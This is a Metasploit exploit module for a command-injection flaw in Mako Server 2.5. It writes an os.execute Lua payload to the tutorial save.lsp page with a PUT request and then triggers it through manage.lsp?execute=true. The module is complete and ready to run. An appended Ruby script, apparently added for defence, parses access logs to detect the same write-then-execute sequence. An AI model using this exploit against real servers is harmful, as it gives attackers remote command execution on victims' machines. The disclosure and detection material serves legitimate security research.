Mako Server 2.5 Command Injection
Source: metasploit.com  Author: Patterson  Published: 2017-11-09
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Mako Server v2.5 OS Command Injection RCE',
      'Description'    => %q{
        This module exploits a vulnerability found in Mako Server v2.5.
        It's possible to inject arbitrary OS commands in the Mako Server
        tutorial page through a PUT request to save.lsp.

        Attacker input will be saved on the victim's machine and can
        be executed by sending a GET request to manage.lsp.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'John Page (hyp3rlinx) - Beyond Security SecuriTeam Secure Disclosure', # Vulnerability discovery & PoC
          'Steven Patterson (Shogun Lab) <steven[at]shogunlab.com>' # Metasploit module
        ],
      'References'     =>
        [
          ['EDB', '42683'],
          ['URL', 'https://blogs.securiteam.com/index.php/archives/3391']
        ],
      'Arch'           => ARCH_CMD,
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Mako Server v2.5 - Windows x86/x64', { }]
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => false,
      'DisclosureDate' => 'Sep 3 2017'))

    register_options(
      [
        OptString.new('URI', [true, 'URI path to the Mako Server app', '/'])
      ]
    )
  end

  def check
    vprint_status('Trying to detect running Mako Server and necessary files...')

    # Send GET request to determine existence of save.lsp page
    res = send_request_cgi({
             'method' => 'GET',
             'uri'    => normalize_uri(datastore['URI'], 'examples/save.lsp')
           }, 20)

    # send_request_cgi returns nil when the target does not answer at all;
    # guard against that before touching the headers.
    if res.nil?
      vprint_error('No response from target.')
      return CheckCode::Unknown
    end

    # If the Server header does not include "MakoServer.net", target is not viable.
    if res.headers['Server'] !~ /MakoServer\.net/
      vprint_warning('Target is not a Mako Server.')
      return CheckCode::Safe
    end

    if res.body
      if res.body =~ /Incorrect usage/
        # We are able to determine that the server has a save.lsp page and
        # returns the correct output.
        vprint_status('Mako Server save.lsp returns correct output.')
        return CheckCode::Appears
      else
        # The page exists, but is not returning the expected output.
        # May be a different version?
        vprint_warning('Mako Server save.lsp did not return expected output.')
        return CheckCode::Detected
      end
    else
      # The above checks failed and exploitability could not be determined.
      vprint_error('Unable to determine exploitability, save.lsp not found.')
      return CheckCode::Unknown
    end

    return CheckCode::Safe
  end

  def exploit
    print_status('Sending payload to target...')

    # The double square brackets helps to ensure single/double quotes
    # in cmd payload do not interfere with syntax of os.execute Lua function.
    cmd = %{os.execute([[#{payload.encoded}]])}

    # If users want to troubleshoot their cmd payloads, they can see the
    # Lua function with params that the module uses in a more verbose mode.
    vprint_status("Now executing the following command: #{cmd}")

    # Send a PUT request to save.lsp with command payload
    begin
      vprint_status('Sending PUT request to save.lsp...')
      send_request_cgi({
         'method' => 'PUT',
         'uri'    => normalize_uri(datastore['URI'], 'examples/save.lsp?ex=2.1'),
         'ctype'  => 'text/plain',
         'data'   => cmd,
         'http'   => {
           'X-Requested-With' => 'XMLHttpRequest',
           'Referer' => 'http://localhost/Lua-Types.lsp'
         }
       }, 20)
    rescue StandardError => e
      fail_with(Failure::NoAccess, "Error: #{e}")
    end

    # Send a GET request to manage.lsp with execute set to true
    begin
      vprint_status('Sending GET request to manage.lsp...')
      send_request_cgi({
         'method' => 'GET',
         'uri'    => normalize_uri(datastore['URI'], 'examples/manage.lsp?execute=true&ex=2.1&type=lua')
       }, 20)
    rescue StandardError => e
      fail_with(Failure::NoAccess, "Error: #{e}")
    end
  end
end
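As an added defensive example, not part of the module above or of the Metasploit project, the following Ruby script parses web-server access-log lines in Common Log Format (the field layout, the sample lines and the 60-second correlation window are constructed assumptions) and flags the two-step pattern the module describes: a PUT to examples/save.lsp followed, from the same client, by a GET to examples/manage.lsp with execute=true. It also lists every PUT to save.lsp on its own, since a tutorial page should not receive writes on a production host.

```ruby
# Added detection example (not part of the Metasploit module above).
# Scans access-log lines for writes to the Mako tutorial page and for the
# write-then-execute sequence described in the module's description.
require 'time'

# Constructed sample log lines in Common Log Format (not captured from a
# real server). The first client performs the full write-then-execute
# sequence; the second only views manage.lsp without execute=true.
SAMPLE_LOG = <<~LOG
  203.0.113.5 - - [09/Nov/2017:10:15:01 +0000] "GET /examples/save.lsp HTTP/1.1" 200 512
  203.0.113.5 - - [09/Nov/2017:10:15:03 +0000] "PUT /examples/save.lsp?ex=2.1 HTTP/1.1" 200 17
  203.0.113.5 - - [09/Nov/2017:10:15:04 +0000] "GET /examples/manage.lsp?execute=true&ex=2.1&type=lua HTTP/1.1" 200 88
  198.51.100.7 - - [09/Nov/2017:10:20:00 +0000] "GET /examples/manage.lsp?ex=2.1&type=lua HTTP/1.1" 200 88
  198.51.100.9 - - [09/Nov/2017:10:25:00 +0000] "GET /index.lsp HTTP/1.1" 200 1024
LOG

# Common Log Format: client ident user [timestamp] "METHOD path proto" status size
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/

Entry = Struct.new(:ip, :time, :method, :path, :status)

# Parse each line into an Entry; lines that do not match the format are skipped.
def parse_log(text)
  text.each_line.filter_map do |line|
    m = LOG_RE.match(line) or next
    Entry.new(m[:ip],
              Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
              m[:method], m[:path], m[:status].to_i)
  end
end

# Any PUT to the tutorial save page writes attacker-controlled Lua to disk.
SAVE_WRITE  = %r{/examples/save\.lsp(\?|$)}i
# manage.lsp with execute=true runs the previously saved snippet.
MANAGE_EXEC = %r{/examples/manage\.lsp\?.*\bexecute=true\b}i

# Every PUT to save.lsp, regardless of what follows it.
def find_tutorial_writes(entries)
  entries.select { |e| e.method == 'PUT' && e.path =~ SAVE_WRITE }
end

# Correlate a PUT to save.lsp with a later execute=true GET from the same
# client within `window` seconds; returns one hash per matched sequence.
def find_injection_chains(entries, window: 60)
  writes = find_tutorial_writes(entries)
  entries.filter_map do |e|
    next unless e.method == 'GET' && e.path =~ MANAGE_EXEC
    w = writes.find { |p| p.ip == e.ip && p.time <= e.time && (e.time - p.time) <= window }
    w && { ip: e.ip, write_at: w.time, execute_at: e.time, path: e.path }
  end
end

if __FILE__ == $0
  entries = parse_log(SAMPLE_LOG)
  find_tutorial_writes(entries).each do |w|
    puts "WRITE   #{w.ip} #{w.time.iso8601} #{w.path}"
  end
  find_injection_chains(entries).each do |c|
    puts "EXECUTE #{c[:ip]} wrote at #{c[:write_at].iso8601}, executed at #{c[:execute_at].iso8601}"
  end
end
```

A lone PUT is worth an alert by itself; the chain match is the higher-confidence signal. On a server where the examples directory has been removed, both patterns should never appear, so any hit also indicates that the tutorial pages are still deployed.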
